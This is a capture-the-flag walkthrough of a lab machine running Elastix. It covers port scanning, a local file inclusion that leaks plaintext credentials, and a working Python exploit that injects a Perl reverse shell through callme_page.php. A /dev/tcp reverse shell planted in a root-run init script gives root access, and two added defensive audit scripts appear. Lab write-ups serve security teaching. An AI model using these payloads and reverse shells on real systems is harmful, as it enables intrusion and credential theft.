The first step, as with all machines, is to run an Nmap scan to identify the running services.
# Nmap 7.80 scan initiated Sun Aug 23 06:24:25 2020 as: nmap -oN scan -sV -O -p- -sC 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.033s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: RESP-CODES IMPLEMENTATION(Cyrus POP3 server v2) LOGIN-DELAY(0) PIPELINING AUTH-RESP-CODE USER STLS UIDL APOP EXPIRE(NEVER) TOP
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: CONDSTORE CATENATE ACL CHILDREN OK URLAUTHA0001 X-NETSCAPE LITERAL+ LIST-SUBSCRIBED LISTEXT IDLE MULTIAPPEND MAILBOX-REFERRALS QUOTA NAMESPACE UIDPLUS Completed ID ANNOTATEMORE THREAD=REFERENCES RIGHTS=kxte THREAD=ORDEREDSUBJECT SORT SORT=MODSEQ IMAP4 RENAME UNSELECT NO BINARY IMAP4rev1 ATOMIC STARTTLS
443/tcp open ssl/https?
|_ssl-date: 2020-08-23T10:30:15+00:00; +2m01s from scanner time.
878/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/23%OT=22%CT=1%CU=43276%PV=Y%DS=2%DC=I%G=Y%TM=5F42455
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=CE%GCD=1%ISR=D1%TI=Z%CI=Z%II=I%TS=A)OPS(O
OS:1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11N
OS:W7%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R
OS:=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11NW7%RD=0%
OS:Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%
OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: 2m00s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 23 06:30:49 2020 -- 1 IP address (1 host up) scanned in 384.20 seconds
From here we can see that numerous services are running on the box, most notably a SQL server, a mail server, and a PBX. I started by browsing to port 80 and found that the Elastix server software was running. I attempted to log in with default credentials, but this was unsuccessful.
I did some searching for exploits affecting Elastix. It's difficult to tell from the login page which version of the software is running, so much of this is trial and error. I found the LFI exploit HERE, which allows you to view the amportal.conf configuration file. This file includes plaintext credentials for the Elastix web interface. It can be browsed to via the following link:
Inside this file is the following block of text, which includes the credentials used to log in to the Elastix web interface.
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
FOPWEBROOT=/var/www/html/panel
#FOPPASSWORD=passw0rd
FOPPASSWORD=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
vtigerCRM
adminL:jEhdIekWmdjE
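The amportal.conf block above shows one password reused for the database, the Asterisk manager interface, the FOP panel and the ARI admin account, with the shipped defaults still visible in commented-out lines. The following is an added example (not from the writeup) of a defender-side check an administrator could run over their own amportal.conf to flag both problems; the sample file is constructed from the block above and the default list is taken from its commented-out lines.

```python
import re
from collections import defaultdict

# Constructed sample modelled on the amportal.conf block quoted above.
SAMPLE_CONF = """\
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
FOPWEBROOT=/var/www/html/panel
#FOPPASSWORD=passw0rd
FOPPASSWORD=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
"""

# Shipped defaults, taken from the commented-out lines in the same file.
KNOWN_DEFAULTS = {"amp109", "amp111", "passw0rd"}
SECRET_KEY_SUFFIXES = ("PASS", "PASSWORD")

def parse_conf(text):
    """Return {KEY: value} for the active (non-comment) KEY=value lines."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"^([A-Za-z_][A-Za-z0-9_]*)=(.*)$", line)
        if m:
            conf[m.group(1)] = m.group(2).strip()
    return conf

def audit_secrets(conf):
    """Flag secret keys that still hold a shipped default, and any
    single value shared by more than one secret key."""
    findings = []
    by_value = defaultdict(list)
    for key, value in conf.items():
        if key.endswith(SECRET_KEY_SUFFIXES):
            if value in KNOWN_DEFAULTS:
                findings.append(f"{key}: shipped default value still in use")
            by_value[value].append(key)
    for value, keys in by_value.items():
        if len(keys) > 1:
            findings.append("same password reused for: " + ", ".join(sorted(keys)))
    return findings

if __name__ == "__main__":
    for finding in audit_secrets(parse_conf(SAMPLE_CONF)):
        print(finding)
```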
Next I found THIS exploit, which leverages the $to parameter in the callme_page.php page to provide remote code execution. By default, this code would not work due to certificate errors on the login page. It had to be modified slightly to rectify this, along with changing the lhost and rhost values. I also had to reduce the minimum SSL version on my Kali machine by editing /etc/ssl/openssl.conf to accept TLSv1. I also needed to modify the extension number to match the one on the Beep machine; this can be gathered by logging in to the Elastix web interface, opening the PBX tab and finding the user Fanis Papafanopoulos with extension 233. The code for the exploit ultimately looked like the following:
import urllib  # Python 2 urllib (urllib.urlopen)
rhost="10.10.10.7"    # target (Beep)
lhost="10.10.14.29"   # attacker listener address
lport=443             # attacker listener port
extension="233"       # extension taken from the PBX tab
# Reverse shell payload
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url)
I then started a netcat listener on port 443, ran the exploit and received a shell on the listener. I upgraded the shell using Python to something more workable, then browsed to the fanis user's home directory and captured the user flag.
kali@kali:/etc/ssl$ sudo nc -lvp 443
listening on [any] 443 ...
10.10.10.7: inverse host lookup failed: Unknown host
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.7] 59571
python -c 'import pty; pty.spawn("/bin/bash")'
bash-3.2$ whoami
whoami
asterisk
bash-3.2$ cd /home
cd /home
bash-3.2$ ls
ls
fanis spamfilter
bash-3.2$ cd fanis
cd fanis
bash-3.2$ ls
ls
user.txt
bash-3.2$ cat user.txt
cat user.txt
[REDACTED]
bash-3.2$
Next we have to escalate privileges to root. I ran “ps aux” to find which programs were currently running. The following process caught my eye: it was running as root, yet the script file was owned by, and writable for, the asterisk user. This allows me to modify the file and then have it run as root to spawn a root reverse shell.
root 3571 0.0 0.1 4636 1168 ? S 21:06 0:00 /bin/bash /etc/rc3.d/S91elastix-updaterd start
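The weakness here is a script that root executes from an rcN.d directory but that an unprivileged service account can edit. As an added example (not part of the writeup), the following audit walks init-script directories, resolves the rcN.d symlinks to their real targets, and reports any script that a non-root user could modify; the default directory list and the temp-dir fixture in demo() are my assumptions.

```python
import os
import stat
import tempfile

def is_risky(uid, mode):
    """A script that root runs is risky if a non-root user can change it:
    it is owned by a non-root uid, or its group/other write bits are set."""
    return uid != 0 or bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_init_scripts(dirs=("/etc/init.d", "/etc/rc3.d")):
    """Return [(real_path, uid, octal_mode)] for regular files under dirs
    that an unprivileged user could edit. rcN.d entries are usually
    symlinks, so each entry is resolved before its metadata is checked."""
    risky = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            path = os.path.realpath(os.path.join(d, name))
            try:
                st = os.stat(path)
            except OSError:
                continue  # dangling symlink or unreadable entry
            if not stat.S_ISREG(st.st_mode):
                continue
            if is_risky(st.st_uid, st.st_mode):
                risky.append((path, st.st_uid, oct(stat.S_IMODE(st.st_mode))))
    return risky

def demo():
    """Constructed fixture: a temp directory holding one world-writable
    start script (a placeholder name, not the machine's real file)."""
    d = tempfile.mkdtemp()
    script = os.path.join(d, "S91example-updaterd")
    with open(script, "w") as f:
        f.write("#!/bin/bash\n")
    os.chmod(script, 0o777)
    return audit_init_scripts([d])

if __name__ == "__main__":
    for path, uid, mode in demo():
        print(f"{path} owned by uid {uid} with mode {mode}")
```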
I started by modifying the file with the following reverse shell:
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.29/2600 0>&1
I then started a netcat listener on port 2600 on the kali machine:
kali@kali:~$ sudo nc -lvp 2600
listening on [any] 2600 ...
I then needed to find a way of starting that elastix-updaterd process. After some trial and error, I found that restarting the system through the Elastix interface caused the elastix-updaterd script to run as the root user.
Once the reboot completed, I was presented with a shell on my netcat listener. From here I confirmed it was a root shell and was then able to cat the root flag.
kali@kali:~$ sudo nc -lvp 2600
listening on [any] 2600 ...
10.10.10.7: inverse host lookup failed: Unknown host
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.7] 47950
bash: no job control in this shell
bash-3.2# whoami
root
bash-3.2# cd /root
bash-3.2# ls
anaconda-ks.cfg
elastix-pr-2.2-1.i386.rpm
install.log
install.log.syslog
postnochroot
root.txt
webmin-1.570-1.noarch.rpm
bash-3.2# cat root.txt
[REDACTED]
bash-3.2#